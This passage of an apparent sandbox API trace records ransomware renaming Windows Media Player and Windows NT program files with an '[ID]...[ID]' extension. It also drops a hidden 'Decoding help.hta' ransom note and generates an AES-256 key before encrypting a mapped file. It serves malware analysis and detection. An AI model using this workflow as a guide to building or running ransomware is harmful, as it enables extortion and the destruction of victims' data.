lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.025] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="wmplayer.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe" [0040.025] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe" [0040.025] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0040.025] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmplayer.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\wmplayer.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.025] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5749e95b, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x5749e95b, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xb19ea830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x20a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPMediaSharing.dll", cAlternateFileName="")) returned 1 [0040.025] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.025] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.025] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" [0040.025] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\decoding help.hta")) returned 0x1 [0040.025] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMPMediaSharing.dll") returned -1 [0040.025] lstrlenW (lpString="WMPMediaSharing.dll") returned 19 [0040.025] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.025] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.025] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="WMPMediaSharing.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPMediaSharing.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPMediaSharing.dll" [0040.025] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPMediaSharing.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPMediaSharing.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPMediaSharing.dll" [0040.026] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPMediaSharing.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPMediaSharing.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPMediaSharing.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0040.026] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPMediaSharing.dll" (normalized: "c:\\program files (x86)\\windows media player\\wmpmediasharing.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPMediaSharing.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\wmpmediasharing.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.026] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59c0b4b2, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x59c0b4b2, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xb19ea830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x73400, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnssci.dll", cAlternateFileName="")) returned 1 [0040.026] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.026] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.026] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" [0040.026] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\decoding help.hta")) returned 0x1 [0040.026] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnssci.dll") returned -1 [0040.026] lstrlenW (lpString="wmpnssci.dll") returned 12 [0040.026] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.026] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.026] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="wmpnssci.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpnssci.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpnssci.dll" [0040.026] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpnssci.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpnssci.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpnssci.dll" [0040.026] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpnssci.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpnssci.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpnssci.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0040.026] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpnssci.dll" (normalized: "c:\\program files (x86)\\windows media player\\wmpnssci.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpnssci.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\wmpnssci.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.030] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4041c528, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x4041c528, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xb1a36320, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x7c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPNSSUI.dll", cAlternateFileName="")) returned 1 [0040.030] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.030] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.031] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" [0040.031] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\decoding help.hta")) returned 0x1 [0040.031] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMPNSSUI.dll") returned -1 [0040.031] lstrlenW (lpString="WMPNSSUI.dll") returned 12 [0040.031] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.031] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.031] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="WMPNSSUI.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPNSSUI.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPNSSUI.dll" [0040.031] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPNSSUI.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPNSSUI.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPNSSUI.dll" [0040.031] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPNSSUI.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPNSSUI.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPNSSUI.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0040.031] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPNSSUI.dll" (normalized: "c:\\program files (x86)\\windows media player\\wmpnssui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPNSSUI.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\wmpnssui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.031] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53bc9d99, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x53bc9d99, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x7ad31980, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xf600, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmprph.exe", cAlternateFileName="")) returned 1 [0040.031] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.031] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.031] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" [0040.031] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\decoding help.hta")) returned 0x1 [0040.031] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmprph.exe") returned -1 [0040.031] lstrlenW (lpString="wmprph.exe") returned 10 [0040.031] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.031] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.031] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="wmprph.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmprph.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmprph.exe" [0040.031] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmprph.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmprph.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmprph.exe" [0040.031] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmprph.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmprph.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmprph.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0040.031] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmprph.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmprph.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmprph.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\wmprph.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.032] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3f3149e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3f3149e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3f3149e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x19000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpshare.exe", cAlternateFileName="")) returned 1 [0040.032] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.032] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.032] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" [0040.032] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\decoding help.hta")) returned 0x1 [0040.032] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpshare.exe") returned -1 [0040.032] lstrlenW (lpString="wmpshare.exe") returned 12 [0040.032] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.032] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.032] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="wmpshare.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpshare.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpshare.exe" [0040.032] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpshare.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpshare.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpshare.exe" [0040.032] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpshare.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpshare.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpshare.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0040.032] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpshare.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmpshare.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpshare.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\wmpshare.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.032] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3f3149e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3f3149e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3f3149e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x19000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpshare.exe", cAlternateFileName="")) returned 0 [0040.032] FindClose (in: hFindFile=0x5a57f0 | out: hFindFile=0x5a57f0) returned 1 Thread: id = 105 os_tid = 0xbd8 [0039.841] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*", lpFindFileData=0xa78fd30 | out: lpFindFileData=0xa78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10505df0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10505df0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.841] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.841] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0xa78fd30 | out: lpFindFileData=0xa78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10505df0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10505df0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.841] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.841] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.841] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0xa78fd30 | out: lpFindFileData=0xa78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1 [0039.841] lstrcmpW (lpString1=".", lpString2="Accessories") returned -1 [0039.841] lstrcmpW (lpString1="..", lpString2="Accessories") returned -1 [0039.841] lstrcmpiW (lpString1="windows", lpString2="Accessories") returned 1 [0039.841] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*" [0039.842] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*") returned 41 [0039.842] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\", lpString2="Accessories" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories" [0039.842] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*" [0039.842] GlobalMemoryStatus (in: lpBuffer=0xa78fd10 | out: lpBuffer=0xa78fd10) [0039.842] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93701e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x230 [0039.855] CloseHandle (hObject=0x230) returned 1 [0039.855] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0xa78fd30 | out: lpFindFileData=0xa78fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab0406e0, ftCreationTime.dwHighDateTime=0x1d4f417, ftLastAccessTime.dwLowDateTime=0x923caaa0, ftLastAccessTime.dwHighDateTime=0x1d4aa97, ftLastWriteTime.dwLowDateTime=0x923caaa0, ftLastWriteTime.dwHighDateTime=0x1d4aa97, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="seemed.exe", cAlternateFileName="")) returned 1 [0039.855] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*" [0039.855] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*") returned 41 [0039.855] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Decoding help.hta" [0039.855] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\decoding help.hta")) returned 0xffffffff [0039.855] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0039.870] WriteFile (in: hFile=0x23c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa78fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa78fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.871] CloseHandle (hObject=0x23c) returned 1 [0039.871] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.871] lstrcmpiW (lpString1="Decoding help.hta", lpString2="seemed.exe") returned -1 [0039.871] lstrlenW (lpString="seemed.exe") returned 10 [0039.871] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*" [0039.871] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*") returned 41 [0039.871] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\", lpString2="seemed.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\seemed.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\seemed.exe" [0039.871] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\seemed.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\seemed.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\seemed.exe" [0039.871] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\seemed.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\seemed.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\seemed.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.872] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\seemed.exe" (normalized: "c:\\program files (x86)\\windows nt\\seemed.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\seemed.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows nt\\seemed.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.872] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\seemed.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows nt\\seemed.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0039.872] CreateFileMappingA (hFile=0x23c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x234 [0039.872] CryptAcquireContextA (in: phProv=0xa78fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xa78fcec*=0x5b0220) returned 1 [0039.873] CryptGenKey (in: hProv=0x5b0220, Algid=0x6610, dwFlags=0x1, phKey=0xa78fce8 | out: phKey=0xa78fce8*=0x5a5870) returned 1 [0039.873] CryptExportKey (in: hKey=0x5a5870, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xa78fbe4, pdwDataLen=0xa78fce4 | out: pbData=0xa78fbe4*, 